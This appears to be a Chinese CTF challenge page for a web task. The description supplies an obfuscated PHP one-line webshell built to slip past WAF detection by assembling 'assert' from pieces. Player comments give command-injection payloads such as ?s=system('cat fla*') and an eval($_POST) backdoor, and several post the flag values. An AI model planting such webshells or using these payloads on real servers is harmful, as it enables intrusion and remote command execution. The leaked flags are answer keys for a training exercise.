shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 5509
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
weiyouzhunze 14天前

标题提示shell告诉我们要命令获取,描述上看得出的是assert($GET['s']),assert()应该不重要,只是判断是否执行正确,关注点是$GET['s'],注入参数s=system(ls),system()是命令执行函数,括号内为字符串,字符串被当作命令执行,这样就可以查看目录下的文件,有个flag的文件,要么执行cat 文件的命令,要么就直接在网站后面加/文件名

回复 0

HK1ng 15天前

根据描述就能看出已经上传了shell,让我们去利用即可,这里没有用菜刀连,直接手动构造,利用系统命令来实现s=system('ls'),然后可以看到当前目录有flaxxxxx,然后直接cat,s=system('cat fla*'),用一个模糊匹配。

回复 0

zhwen 15天前

简单PHP木马的利用,s=system("ls");

回复 0

zfly 1月前

?s=system('ls') ?s=system('cat fla*')

回复 0

八一卜kod 1月前

cat

回复 0

freestyle 4月前

s是传递的参数,get型号注入点,就是这么简单 ?s=system('ls')查看当前目录发现文件名,再通过cat、more、less、head、tail等查看文件内容

回复 0

000ooo 4月前

?s=eval+($_POST['123'])

回复 2

ruien 5月前

答案就在描述里,上传的s参数如果是字符串会被当命令执行

回复 0

112356 5月前

flag{0aa5253236aa8d97368bd753cb3c4cf2}

回复 0

迷茫的三千面 5月前

flag{f790b1679ece8cfe8ce3fc425c30896b}

回复 0

WriteUp

image
harry

3 金币

评分(8)

解题动态

DoubleUUU 攻破了该题 7分钟前
zongcheng86 攻破了该题 3小时前
等保工具人 攻破了该题 7小时前
13390355632 攻破了该题 16小时前
oopyman 攻破了该题 20小时前
15080841307 攻破了该题 22小时前
3287973822 攻破了该题 1天前
asdwtwty 攻破了该题 1天前
Ethan丶 攻破了该题 1天前
你在说什么啊324 攻破了该题 1天前
SZd12 攻破了该题 2天前
ZZLIZ 攻破了该题 2天前
ccttffwwyy 攻破了该题 2天前
296614117 攻破了该题 2天前
ookjhh 攻破了该题 2天前
CyKe1 攻破了该题 2天前
daundian 攻破了该题 2天前
15195388189 攻破了该题 3天前
Makaba 攻破了该题 3天前
z蔷薇花开z 攻破了该题 4天前
问题反馈